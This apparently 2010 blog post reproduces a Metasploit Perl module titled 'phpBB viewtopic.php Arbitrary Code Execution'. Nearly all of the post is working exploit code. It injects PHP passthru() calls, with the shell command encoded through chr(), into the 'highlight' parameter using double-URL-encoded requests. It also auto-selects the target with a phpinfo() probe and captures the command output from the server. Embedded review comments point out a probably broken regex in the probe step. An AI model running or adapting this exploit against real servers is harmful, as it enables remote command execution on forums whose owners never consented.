
Monday, January 4, 2010

phpBB Highlight - Remote exploit for phpBB

By Attack Research

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::phpbb_highlight;
use base "Msf::Exploit";
use Pex::Text;
use strict;

# No advanced (expert-only) options are exposed by this module.
my $advanced = { };

# Module metadata handed to the base class by new().  Key meanings are
# those the Msf::Exploit framework expects; only the parts that this
# file itself reads (TARGET index, the UserOpts names) are certain.
my $info =
{
    'Name' => 'phpBB viewtopic.php Arbitrary Code Execution',
    'Version' => '$Revision: 1.1 $',
    'Authors' =>
    [
        'valsmith [at] attackresearch.com>',
        'H D Moore ',
    ],
    # Empty: the payload is a shell command run through PHP on the
    # server, so no client architecture or OS is implied.
    'Arch' => [ ],
    'OS' => [ ],
    'Priv' => 0,
    # Each entry appears to be [required-flag, type, description, default];
    # inferred from the values below -- confirm against Msf::Exploit.
    'UserOpts' =>
    {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 80],
        'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
        'PHPBB_ROOT' => [1, 'URL', 'The phpBB root Directory', '/phpbb'],
        'SSL' => [0, 'BOOL', 'Use SSL'],
    },

    # Command payloads only ('cmd', 'cmd_bash'); Exploit() wraps the raw
    # command in a PHP passthru() call.
    'Payload' =>
    {
        'Space' => 1024,
        'Keys' => ['cmd', 'cmd_bash'],
    },

    'Description' => Pex::Text::Freeform(qq{
This module exploits two arbitrary PHP code execution flaws in the
phpBB forum system. The problem is that the 'highlight' parameter
in the 'viewtopic.php' script is not verified properly and will
allow an attacker to inject arbitrary code via preg_replace().
}),

    'Refs' =>
    [
        ['OSVDB', 11719],
        ['OSVDB', 17613],
    ],

    'DefaultTarget' => 0,
    # Exploit() uses only the *position* of the chosen target: 0 probes
    # the server and picks 1 or 2 itself, 1 and 2 select which encoding
    # of the 'highlight' parameter is sent.  The second element of each
    # entry is not read anywhere in this file.
    'Targets' => [
        ['Autotarget',0],
        ['phpbb <2.0.11', 1],
        ['phpbb <2.0.15', 2],
    ],

    # NOTE(review): presumably search keywords for the framework -- confirm.
    'Keys' => ['phpBB'],
};

# Constructor: passes this module's metadata and (empty) advanced-option
# table to the base class, forwarding any extra caller arguments untouched.
sub new {
    my ($class, @args) = @_;
    my %ctor_args = ('Info' => $info, 'Advanced' => $advanced);
    my $instance = $class->SUPER::new(\%ctor_args, @args);
    return $instance;
}

# Exploit: build one GET request to viewtopic.php whose 'highlight'
# parameter carries the payload wrapped in a PHP passthru() call, send
# it, and print whatever the server echoed back between the _cmd_beg_ /
# _cmd_end_ markers.  With target 0 a phpinfo() probe is sent first to
# choose between the two encodings (targets 1 and 2).
#
# Reads the user options RHOST, RPORT, VHOST, PHPBB_ROOT, SSL and TARGET
# plus the framework-supplied EncodedPayload and USER_AGENT.  Returns
# nothing; all output goes through $self->PrintLine.  A socket creation
# failure is printed and ends the run instead of dying.
sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $vhost = $self->GetVar('VHOST') || $target_host;   # Host: header falls back to RHOST
    my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
    my $target_idx = $self->GetVar('TARGET');
    my $phpbb_root = $self->GetVar('PHPBB_ROOT');
    my $user_agent = $self->GetVar('USER_AGENT');   # NOTE(review): never used below; no User-Agent header is sent
    my $target = $self->Targets->[$target_idx];     # NOTE(review): never used below; only the index matters
    my $url;
    my $byte;

    # Add an echo on each end for easy output capturing.  The same markers
    # are what the response parser at the bottom keys on; since they travel
    # in the query string they are also an easy thing for web-log review or
    # an IDS rule to look for.
    $cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";

    # Target 0 (Autotarget): send a phpinfo() probe through the same
    # injection point and pick target 1 or 2 from whether it shows up.
    if ($target_idx == 0) {

        # %2527 / %252e are double-URL-encoded quote and dot.
        $url = $phpbb_root."/viewtopic.php?t=1&highlight=";
        $url .= "%2527"."%252e"."phpinfo()". "%252e"."%2527";

        my $request =
            "GET $url HTTP/1.1\r\n".
            "Host: $vhost:$target_port\r\n".
            "Connection: Close\r\n".
            "\r\n";

        $self->PrintLine("[*] Sending the malicious GET request...");
        my $s = Msf::Socket::Tcp->new
        (
            'PeerAddr' => $target_host,
            'PeerPort' => $target_port,
            'SSL' => $self->GetVar('SSL'),
        );
        if ($s->IsError) {
            $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
            return;
        }

        $s->Send($request);
        # NOTE(review): the second Recv argument is presumably a timeout in
        # seconds -- confirm in Msf::Socket::Tcp.
        my $results = $s->Recv(-1, 20);
        $s->Close();

        # NOTE(review): as written, "\p" followed by "h" is a Unicode
        # property escape, so this pattern is unlikely to compile; the
        # upstream module presumably had something else here that was lost
        # when the page was rendered -- confirm against the original source.
        if ($results =~ /\phpinfo/) {
            $target_idx = 1;
        }

        else { $target_idx = 2; }

    }

    # The index is matched as a string, which is fine for 0..2 but would
    # also accept e.g. "10" for /1/.  In both branches every byte of the
    # command becomes chr(N); the `$_ =` inside map is redundant, map
    # already collects the block's value.
    # Target 1: pieces joined with the double-encoded dot, wrapped in
    # double-encoded quotes.
    if ($target_idx =~ /1/) {
        $byte = join('%252e', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
        $url = $phpbb_root."/viewtopic.php?t=1&highlight=";
        $url .= "%2527"."%252e"."passthru($byte)". "%252e"."%2527";
    }

    # Target 2: same encoding, single-level (plain '.' and %27).
    if ($target_idx =~ /2/) {
        $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
        $url = $phpbb_root."/viewtopic.php?t=1&highlight=";
        $url .= "%27."."passthru($byte)".".%27";

    }

    # NOTE(review): if neither branch above matched (a TARGET outside
    # 0..2), $url is still undef here and the request line would be sent
    # as "GET  HTTP/1.1" with an uninitialized-value warning.
    my $request =
        "GET $url HTTP/1.1\r\n".
        "Host: $vhost:$target_port\r\n".
        "Connection: Close\r\n".
        "\r\n";

    $self->PrintLine("[*] Sending the malicious GET request...");
    my $s = Msf::Socket::Tcp->new
    (
        'PeerAddr' => $target_host,
        'PeerPort' => $target_port,
        'SSL' => $self->GetVar('SSL'),
    );
    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return;
    }

    $s->Send($request);
    my $results = $s->Recv(-1, 20);
    $s->Close();

    # Pull the command output from between the echo markers; /s lets the
    # capture span newlines.  Leading/trailing whitespace is stripped, and
    # a result that is empty -- or exactly "0", which is false in Perl --
    # prints nothing at all.
    if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
        my $out = $1;
        $out =~ s/^\s+|\s+$//gs;
        if ($out) {
            $self->PrintLine('----------------------------------------');
            $self->PrintLine('');
            $self->PrintLine($out);
            $self->PrintLine('');
            $self->PrintLine('----------------------------------------');
        }
    }

    return;
}

1;